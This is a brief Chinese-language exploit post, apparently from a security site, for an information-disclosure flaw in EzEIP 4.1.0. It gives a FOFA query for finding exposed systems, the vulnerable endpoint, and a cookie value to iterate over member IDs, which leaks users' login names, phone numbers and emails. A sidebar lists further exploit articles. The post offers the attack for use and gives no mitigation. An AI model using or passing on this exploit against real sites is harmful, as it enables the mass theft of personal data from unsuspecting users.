# EzEIP 4.1.0 信息洩露漏洞
==FOFA==
"ezEIP"
==漏洞利用==
漏洞Url為:
/label/member/getinfo.aspx
訪問時添加Cookie(通過遍歷獲取用戶的登錄名電話郵箱等信息):
WHIR_USERINFOR=whir_mem_member_pid=1;
==參考==
https://short.pwnwiki.org/?c=NqyKZe
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1致远OA checkComponentFile后台反序列化任意命令执行
2025年12月17日2金和OA AjaxForDepartmentCollect.ashx SQL注入
2025年12月20日3offsec WEB-300 课程:高级 Web 攻击和利用
2025年12月21日会员专属4友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE
2025年12月18日5东胜物流软件 GetAuthorityRange 存在SQL注入
2025年12月22日6安友固定资产管理系统 DoUpload 存在任意文件上传
2025年12月18日标签云
请登录后查看评论内容